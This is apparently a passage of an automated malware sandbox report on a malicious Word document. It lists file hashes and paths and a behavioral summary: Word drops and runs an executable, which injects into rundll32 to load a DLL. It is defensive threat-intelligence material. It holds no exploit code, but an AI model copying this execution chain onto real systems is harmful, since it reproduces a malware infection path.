| SHA512 | ac640df18b404c85ae7bc6222ab9a7f68a27011a6e02297d42e6edc88f4f708c59e48dd85570ef5a3eb37f140965c90ec8555ff35561bf1a86795abffea8e423 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_objects.help.txt
| MD5 | 9db8b85638082548823b9da7a5496963 |
| SHA1 | 4fe83d94144a4a45a4f70cc8d4608dcccf7c3d75 |
| SHA256 | abcca25ecd6be168d4013db69836d75626a1af9d921016c35ac54fed72b4d4b9 |
| SHA512 | 227396b8bdcfe588b26899af2ee29a117fbaf4acf2fcdc24ad9e5422090ffe748ae3f67a88d61ac73ca9b65f7ab876bb3b05032c4756d6e87669bc957aee5258 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_modules.help.txt
| MD5 | cbd14e01245df6c5c7ba1c02f9012bfb |
| SHA1 | a286e3eb786b5390481c754ec8340f29151f63e4 |
| SHA256 | 89bf576183e6a67385ad75bdd8eebc0b4ba9aff2e3fb95db125928de70e7eedd |
| SHA512 | 9174fa17adec27b3c9a113bbb62dc1802e3af1d77f387b38cfcbd685859d652bbbe320a2be1473366498aef032e930fc4cd589ed0eaae8da718d96d1446527ab |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_methods.help.txt
| MD5 | 8460c01da494f631643fc26b6089de5d |
| SHA1 | 561d8ed7534ff70be5ba899c12ce89178c8f1aac |
| SHA256 | e3af28e0c1a0de76afbf0956520d8415adb5ca481d9e8af41ab92bb18538e8e7 |
| SHA512 | 7cc3c60da69d31c964c870f26ffae98702eb66e7553cc335a7b16841700bb8f7e6b07863248c3df5cf25b0a930f8df97ff9259590cfe7ce57631c6c942eeea45 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_logical_operators.help.txt
| MD5 | 0b2cf5e1ac2ae1ea802e19cbca49051f |
| SHA1 | ea667dbdcd0d4c3272f8d96326e7331a4712e3ff |
| SHA256 | 2f85dab515c9c9246cf0fc9d0c3bb42be4cc442d15a8bc56c970781bc3b1d231 |
| SHA512 | 22dcf49c5f3524c0098e175d98ec092c87191ce93dcf3e1be86d5b07dd702add436252545e8a5e36640619bbae8d19946dba9290ecf29cbf30a85f998bc608d4 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_locations.help.txt
| MD5 | 3ebe6da806cd7f2fc52587711bef790c |
| SHA1 | 94a9c82f84d66de7850f7ce9bf721577a353293c |
| SHA256 | 31eb034f8981d43a6c6f33a8a073478240eedd7097361a863be1181422c85b31 |
| SHA512 | 1cf71402e0bb1fdc211fc4b1f24d9bf16f8517088cc231ea2f63bc7b5dc75217dcdcdf6a5b698ebf10c8d70ea0a7f85c275456501ecd2c141d15e8543175f30c |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Line_Editing.help.txt
| MD5 | 03e0760948a12709242d96532514f3d4 |
| SHA1 | 8a16de105f121b98f34aa015860f19bf92380563 |
| SHA256 | d7c58a401032386b7230bb80a3e26ce2a24c6b30b3c481823d34d1820c5dcd92 |
| SHA512 | 77651dcc49da2d1db7633bfa3c87e8938b65398b0cd6b7c38f5fa5851a3c7b0d85e895979358134f6e2230b85c3c7a12991e5e01724b18dfff35aeb3ebaddaa5 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Language_Keywords.help.txt
| MD5 | 11187d15f49f2a5f03a55df1f8fca9b3 |
| SHA1 | e9121a366d288d2e911d391c469b6e159a09897a |
| SHA256 | 38f660086eb7b49c84bf41ebc91aa212fef09e7cd9505b60751e7afc7b9c52bf |
| SHA512 | 9fcd7bfa586b38b387c960437b30b3d282abb045236e2346204275995b2c71edbf72c997f27a581ce80010bec42c9aa5da76861fc0d03a8921747cb23035a258 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_join.help.txt
| MD5 | 01310ec53625886957d2d605a0705ee4 |
| SHA1 | b61a2c3b4493c7aef1feb64d938bd82c3350dd9d |
| SHA256 | 37a8bbd939fdd05e3b48bb816e882a5f11f16a599a5f315f221afc7dbd0a0dd0 |
| SHA512 | c188c23da16da33b6b9d7700eb084ebf1fb0c0d8345c1673dc4a5a3a32f14bb2cf5626e924974f64fd1b185aa370244285246c75ac2efc36432b6dea25212e00 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_job_details.help.txt
| MD5 | 682faa58139dfc4c2a096dc8936da569 |
| SHA1 | f1a79e28b879886b432b1aa099153b1476cce921 |
| SHA256 | f15a896a451d4de419df02d3f40712a4a246c30844b3f0cf672e47d7ca04703f |
| SHA512 | b65da741a0471e7d66ef67b9ab48fc769b97eb4e28c4783bc8381fd8c91ecfec5fdea20ef14f2b9bf16e2b063afe1abb1263b691ced8dc7812ebb112a123cd0f |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_jobs.help.txt
| MD5 | c43bcccef0cd6ade752bb2c4df7caee1 |
| SHA1 | 52716195b02f2e10116155c438a49b37e02a2ba7 |
| SHA256 | abff4dfa063ed3d37f9c8dbe6ea532ea564cecf481f87e69bc85012d9546d6c7 |
| SHA512 | 5790d1ebd0a6a70cf5ea48f0910ebe2fd01d5f8cdc31b1af2845b6a9ad5f68a8b9948caf650a57dcd98e57df7302bcd05de87d0306357a356f54e3887fce466d |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_If.help.txt
| MD5 | 3bcf3a2c311fd7ab3d5dd745656e980a |
| SHA1 | 90c8e5623abb4d31cb1e84e19ad98b6f9da5b802 |
| SHA256 | dd80a6ff9140258ed90ca153cea0365758c6268b49fb4af1f4690309290747d5 |
| SHA512 | 25bf92a69a6b2e25dc24460b30577e1dea3f91790a401682a77a6febdf61eb42138d5580651c85ea328d9d0ce2540db638c3417977d1d29bcb1c20bafef85e9e |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_History.help.txt
| MD5 | de57551541bb66190bb1b681c8810832 |
| SHA1 | 19645c5dafd1b10a7a1d541ec1e187fb135c81b0 |
| SHA256 | 3c27e4880181ff4d32e935ef033574308956524603be510ace490ee37dc9fb21 |
| SHA512 | 9915af82c40ce9ccbf9f7bf1af8765a787a0dfed4360a48579f4df545a3cdd725d4c9ee75f39f48ab5d2f7879277852ff34ce49c47c003d56b73f15431e76385 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_hash_tables.help.txt
| MD5 | a699d20e9183f442024e6cbb9a77996c |
| SHA1 | d3dde9339283a6c1dfc0b519cafc35ffd1f19561 |
| SHA256 | 30297fa171f447665cb86e067f7b66a4661d9a552adb781148092ad6f8b25455 |
| SHA512 | a6c8d816b57bca9c0b8b8785cf1117febae6a8a533999e97dffc7d3e46a8820a902f81c78721abf7f4d4c81873e1d5bc9dc8c464aeb781166356353db4a2d2df |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_cmdletbindingattribute.help.txt
| MD5 | 2317e5a12ff2f18c11305ba77e24fedf |
| SHA1 | 7fae7ed923cc7f21a50bd3a154a0453c651ae6c1 |
| SHA256 | 3ccc22a7e678234dfed8147449525e54d0566042476c739d229c320e27a37904 |
| SHA512 | bd3df932a58655e5344cdaab435c869545fbf6e522ff6f9fb1d61200291479fb0fbcb8da232462d81897014403ada2ec5090af88fef42ffb4c3df2048e4b6230 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_advanced_parameters.help.txt
| MD5 | 80e6b6298435366fbd0ee749285a0669 |
| SHA1 | 1272804741af03c2a7301c95f003a6b1fc402498 |
| SHA256 | 6e17d4806ad994005ed45a9b37f5d6e4966586a5ffa0ca7aaae4b8891d1120da |
| SHA512 | 2ea13fcb713264a37ed49e5e00259f17ee53a4d6a2194ad54bcf8f387af207e7d035179643d93ae6e4fd96a423db38453e63d9bab7834550f1f6186992391b97 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_advanced_methods.help.txt
| MD5 | 418d1c67764a96b5111bc6b841a739a3 |
| SHA1 | 0ebcad08ab75bac1ca252df94d3a08a49dcf68d3 |
| SHA256 | ad36056f66a17b4227e5b68ba80af8b7cf43b7ed45fcf5ea641414976e2a6d0c |
| SHA512 | 63e8774922d01638693bd269085e8a453e28a705aa0029a8308b12aa664144099dee781c762b8a7093e1eb7dee4fcbcc8da99de70abd9f60e85bed0d847beaa0 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions_advanced.help.txt
| MD5 | fe24e5c8c929a82500776594d8984aa8 |
| SHA1 | 37caac5b58316bc66461dd0dda2951e05bec57a1 |
| SHA256 | 903db92a14ad821416f09a3f43ea1abf6223dcc92143bf3fb010bcd57acc0b2b |
| SHA512 | 6457f2f5e97b63f8053cba30734e82b471af3d3e92edbcd50471b6bac87652c6a4e34988d41a5eb511a2374b30c78c44a8ad8e0c113a56d9ea830d728bf42bd8 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_functions.help.txt
| MD5 | 6ce44a80e290cfcc3452c48721e71524 |
| SHA1 | dc135d036ca528d8c44a9eb65e1008ff52e23ca4 |
| SHA256 | cafbb0af256cad753f1359063e6f71a18c6b93ea38fcf2c65bd5b6bde44843bf |
| SHA512 | 1fa246ae118211d3a243c3ee1ff1da47b5c5abaac76c19b4399c3250c231deca7ff1e5ca27d14dd56188d9ec623fda430386293817b5d130e0784b19509f22a6 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_format.ps1xml.help.txt
| MD5 | bc3dccff29a510579cfe061649d9d438 |
| SHA1 | d8d34bcc7c8bb64d9cc072a2695564f9b565e47d |
| SHA256 | b24a01eb23d6a816ef102b21d1b5230f99b6b5b9fb41215aa85fbd773ac28bed |
| SHA512 | 702af443bd1cc3b892a2c32098f0a73a89dbe073535bcde143742a284eebad1ec4bf5e21f3cc91a26d58ed2a42c23422421d9f9b55cb54d0f38cd6fe58bb917e |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Foreach.help.txt
| MD5 | 22dbef4164c09f728e0861a8588314f8 |
| SHA1 | 007a83441b906f7b03979f76b7d83fc19fd2c533 |
| SHA256 | e81a5037837b58420ab591cf3527589bb3e73fc8bcb174f1d0c140df6c60c682 |
| SHA512 | 21954232064de84ce03e39392a334db8c4e5e2c5689a2c4fc519507cb02cc6c8461f5a8290230fd5b2b40ebaae24ef48a55422a9b34df69eecdb0be154ebb540 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_For.help.txt
| MD5 | dbf81f791d6e820399e4e4a89b618d36 |
| SHA1 | 5828837f5320f6564ec109ae85ca4b93a488abaf |
| SHA256 | 3367c55c9d4cc665530927b50714445862019a0d63bde1038b01128a0e9b3235 |
| SHA512 | 06f91afdc898b1f41d40a4445acc8069d1d13a02667cf83ba9915b353e2f8e696b518e56ff798c8559115bc45d420474e1ccd1fa41a5b97c9d52bd455e383f03 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_execution_policies.help.txt
| MD5 | e4e95d21cb03648eaba93329eb4bdd35 |
| SHA1 | ae9fb1273604b30ddfd3dddefa7bf06cf0a23765 |
| SHA256 | cb0917afc8dc0f03ab8d94bb4fd466e1322cec03f8c1c07c835c72f7fbbee8ce |
| SHA512 | 1469ab43307dab8ff65d77a27171e409b7c9502175024f3640dea75c046c9efc0cb11a5d4be4c8f3ad8122b8d0b05b24faf4f9fa139e7887144290a73eac279a |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_eventlogs.help.txt
| MD5 | 880d0c263df4dd08a5da81af7b073112 |
| SHA1 | 52910f3285f450ddf8efcad28b96ded3453afde5 |
| SHA256 | 2fbbf7881fd34e664b54c8b8ff3a10a22ec252a1410acaadf02093f1cbc2244f |
| SHA512 | f707d6f69ca119b3ac6c373071b7405590dfb68f4dc5673ca7299bc6f0cce5a0f9f2f2050471b9d5f4d42628ed9f9f5cb307e1c35c1a8caefc08974e9b58ba80 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_escape_characters.help.txt
| MD5 | 337a9d236103c3c063669e5d529e280e |
| SHA1 | 39dd8235ced9e0e85b02897a006958467a7073d0 |
| SHA256 | 48752ab78d29db064965e3aea7c7953299035d9bbffa3879d21effbb205ae65c |
| SHA512 | 674bec17be338833affc02d91f1f2062ca9a957b3e2b33bb309affe9be461565d340e2770b5d7fa22ab891d383da500a7c78ec46c2b8e2869c967339e624091b |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_environment_variables.help.txt
| MD5 | d891f9ba515c2089629feff55decd66f |
| SHA1 | 2e2a0deda2a0cb87b9aa473c112f5780fe62b328 |
| SHA256 | dd9f132e755ed92a4b93c2245c086bedf01dda4a47baa5129072d3e3dda37c0e |
| SHA512 | c68ed52c8f15fe0b3284563b0c73d2c79ec49f55e8b75d79803831c72cd7241a584c4bf6615e84899e104d775ffd83ef444c07186ddc76487a65ea430a6773d8 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_do.help.txt
| MD5 | 91b288df5e35003c61108259e796a9e3 |
| SHA1 | b330c477d30a3efb8e7e8ece8deb52454f78e38e |
| SHA256 | 452abffaa192025d23a3c8139c2e93c1da952b9beb02cc2729cb4072ec5dfa06 |
| SHA512 | 7b025e2f587371f463324fe03d05b61e8ba4fa050e6348b3afcc6296abec8d2d4c6c4639ddc50412208c24f75342227d88de398b21e79aea493bf472216615c6 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_debuggers.help.txt
| MD5 | 3698389d3dba0d8441a91d9c1b590713 |
| SHA1 | 6bf21add4da83a5dab9ada126161b6dcff5134fd |
| SHA256 | 79aa3094e5790d70f12738c2f0449cde16b88c58ba9c470efbafca1696703a18 |
| SHA512 | a9b2bd0560c3d8959d74911e199b21de8cf77613d69834efd968d50ff39eb211cf43d89c327e7317c2dca7ce075ab5c8b08f0ed2623e624da31ba3ed0b6e6ef0 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_data_sections.help.txt
| MD5 | a33d516fbd7fc781c49ec974d240c8bf |
| SHA1 | 858cbb2b5b35b4a0317469d6f691834bb0fb6e09 |
| SHA256 | 772bf94806392d132b6aef7b2ea62649a77f3ac165158d8dd22dd9e8620d9dbd |
| SHA512 | 2888067d9ff8196d4c2525756c58899290a4da832776c1b0b75b898e6f5a3c43b2d038d981cec1856de8842b2a4b90b5c419bbfd35f6e0011132a57b19a55104 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Core_Commands.help.txt
| MD5 | ba47e8024553dcf2e0accdf9cdcaf8a9 |
| SHA1 | aecc05a68c01533a19e667ba35c410010592e5b3 |
| SHA256 | de62ff1271b7de9799ca6cc135609e9af95538ee370badc1d607698cfcfbcdda |
| SHA512 | 1fa4ada7e88fe9a9c61a38f5f1ceeef44e41a59ea5dfaca3858fbfbcd506c8c33d3db188f5987edf5bdeda4a9a8909061556a91a9f0ca862820ad63d17b3f53d |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Continue.help.txt
| MD5 | 82efcd37b0c24c85afc05b07357d7ad7 |
| SHA1 | 8656541326be6a21e47c83c318b222b00f7dc582 |
| SHA256 | fc6338cf21ba159b85abd24f3243cb28833370719d44edfd28aceba40a3e7aee |
| SHA512 | 60778c599c141a11d429acf540cd7aee2c745a189c1a596403aca9e3851e5b71be1573c22f947364e1c0564da976878de0f8b5ce8256795f47cdec3ef1e8f93c |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comparison_Operators.help.txt
| MD5 | 02cb964baa087eef002abee9fe44b737 |
| SHA1 | f0984de65b88a05a587f73a65390bec75f525893 |
| SHA256 | c9ed776cb3db4aee63bad4241b924331535734383819864d5e3dacd3f13ce966 |
| SHA512 | b8b1aac40532ba210b1a3063a4157a31f633606415beccdafcadb440924a45678d20c91308aab65e99e73a1e265548dcc682e87b0cd9481aee5e40a386a9d3ce |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_CommonParameters.help.txt
| MD5 | fbe14cf1b768d59274268a2f2be325d6 |
| SHA1 | 927a2c41c33fe6e2a11123572f7006513f61d238 |
| SHA256 | 73e4622de52a79256a31a9106c6bde06f504d947bba4c9447659d0c5bae29bc0 |
| SHA512 | 994dd644b4de9ba096c25869d0ec7b2515e619312f8c12d433fa4dee2ed5d80ab29c5483b73fb5353f4e6a00104805c1d29d026e4f6ca3c52a71b0d8b66f1db4 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Comment_Based_Help.help.txt
| MD5 | 009b7ec3fd8f6c5daad1ab8f873915b6 |
| SHA1 | bca72d30c853f8ac9786fee63dbfc920c2a137e4 |
| SHA256 | 430f02362331f401c42b01e1e5db75aace1dd21cf284eca9c75d7f3ce5887317 |
| SHA512 | f20f440fa5318c1d003e1412475a941a34c38e4c35ff2cf2f5e307d0aaedc558afed0dfda3da73c50d59533b295eb07d9e18b950cfe8df346c40613d750bcf5e |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Command_Syntax.help.txt
| MD5 | ffd244fc1f06b51c996b5a6872320423 |
| SHA1 | 740900b06bc02dfc5c6021e73ea77efd4b96f30f |
| SHA256 | 91eeabb4ed7c2ec5871c9687ca9d2e9c95d0fdf1235dd2458da2503223d5b0f2 |
| SHA512 | 34c8b5acc1fa2dcf7708238c5778591c421e8eac724c9d63dbe2b83d4184812a64d97a0bcf0aebf4128d88da6c11aad7cd383c7a4f96fcf4b3d2b6b52de853b1 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_command_precedence.help.txt
| MD5 | 506751f802c30165339fbe9f6ded6bdb |
| SHA1 | 128f8f92eac5ccbb746122ee084c3f94a134cee1 |
| SHA256 | a9a9eeb12ac7959dbe46322ab40fe4794be936d4a4b9ecfc1a9e7e6c93feaf9f |
| SHA512 | a14fccddb1682af9a2a6c8d1e739d4416ee4f5c2ed816b0e480946e6b8ddbc69b7c408fb3309e06c5c8f049142558ef4402d98eafbb3b35d3a0ba9075f3ae445 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Break.help.txt
| MD5 | 710ff8a9e47e741f5d09c82ffcae3057 |
| SHA1 | 2308e17617a45716e1664b591fab17227630f6b2 |
| SHA256 | 3c4bd767e1e9027c5f8fa7f2717bc3a32fe71cc808c3b53fcf0eff3fa62fdcc3 |
| SHA512 | 2624b4b7b784043e4cbfe5bb51292998d276aaa75366906b571f8d66c9408352726d65ee2e78e92d58db247037a0d4d48199c3a442977404568aaa43874a1aca |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Automatic_Variables.help.txt
| MD5 | 2060451a52f4a9083f0f554492d7b261 |
| SHA1 | 346ba51823c9b0a67cbc0509adfe789b7b681a0d |
| SHA256 | 5a16ce4adf1b862edf7bd253e66bfc125cd79b227729f5a0522a84d37f004858 |
| SHA512 | 3ac42e061aa4c104a05e24d54d256fbfb702f43d4f4bcb8b84db13f626320779f5ecb865b515a8af00b0220b5cab1c4db7ddd97c8265c4bec68655f4426138c7 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Assignment_Operators.help.txt
| MD5 | b335d7490dd7429bd096fee82a807008 |
| SHA1 | 167d0d8543f818425cefc25865b978de906aa301 |
| SHA256 | 1b669af68a8743144b0a2812471afd504cef88b449d91e2c2d5c58cce98328f6 |
| SHA512 | c1eaa81c5ef42a6de736bcc2195fb82f0b37638ec84d1f6a421417fa87eebd0418fc642446f3cf3c831b36fbaac97d530d7e36de8ee5b47a8bd1397e0b7b022a |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_arrays.help.txt
| MD5 | 253b0f328ce98fb2d89f4de1a093df1a |
| SHA1 | 1f0a9729416fce3a216ad2e74d695fcc175ea707 |
| SHA256 | 907593a534706387725101cc8eeeef44d0df4de22a90f17789055769e103004f |
| SHA512 | 838dfa89927ce6112aba361fd3b13f5b283f07038f17b3a7355fd8ba87fc8c2c03fe3c8ab2a239dd78231b18ae197e3ea4c7ef9d26ddea17dfef0533967638de |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_Arithmetic_Operators.help.txt
| MD5 | d29f635492b5b2f98d7623284899b1aa |
| SHA1 | 5db4c47cc44f17848b80029d8a8348cef7a5dc56 |
| SHA256 | 8d5de2726faeb445042196cfd80b132bf5adb2c87241f42a29c88e9d75fcb759 |
| SHA512 | 923d2fd2f82dda05f63d3a8ab7b091dd4a8ff5b5404171bdebc96f0401bf3d84334f0d9b6f43495656f6a7997c194ce58046d20ef31d8e24e7bb056f961a2f11 |
C:\Users\Admin\AppData\Local\Temp\gxeofiu\de-DE\about_aliases.help.txt
| MD5 | 8f461cb12c72a2704845e509ed06c858 |
| SHA1 | 554b6c81fb67569f1dbb5a0423d113a7d0f9a57c |
| SHA256 | 12898e59ef4f1e6729d79ba022883a7e6f088447767a02e8534e11f04424d644 |
| SHA512 | b5d065f46540f7c3087dc613cfa1026da249a19f669b354bf3caa035c58e44f6ba335ee7075877d404f9d539584c8c3a63c6cceafce2d80df986fea7399bdbba |
memory/2284-745-0x0000000070B8D000-0x0000000070B98000-memory.dmp
memory/2284-746-0x0000000000450000-0x0000000000550000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 971725ce794c620315c14c3f81237595 |
| SHA1 | 65db3fbac64d4dd5689f130de853ff3c5059c280 |
| SHA256 | 3a556c634df4b0aa3ad41133d0afa3fc488b88a7f9cb50a1cb329dfd96f5cb4e |
| SHA512 | d0dbcb64f331a215d993ca32841888d5cf50414540d18d0630c6d1e9498c36c1d4c9ef253b4e6d9760cfbb2cf7a9a579c85fed9b48c644f49550e18ab44266a6 |
memory/2284-761-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2284-762-0x0000000070B8D000-0x0000000070B98000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted: 2024-05-20 04:19
Reported: 2024-05-20 04:22
Platform: win10v2004-20240508-en
Max time kernel: 145s
Max time network: 127s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4984 wrote to memory of 4944 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe |
| PID 4944 wrote to memory of 948 | N/A | C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe | C:\Windows\system32\rundll32.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5d26fff174b5864a0fd899ccb8c9a3fb_JaffaCakes118.doc" /o ""
C:\Users\Admin\AppData\Local\Temp\gxeofiu\xea_kueou0.exe
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\etase.dll f1
Network
Files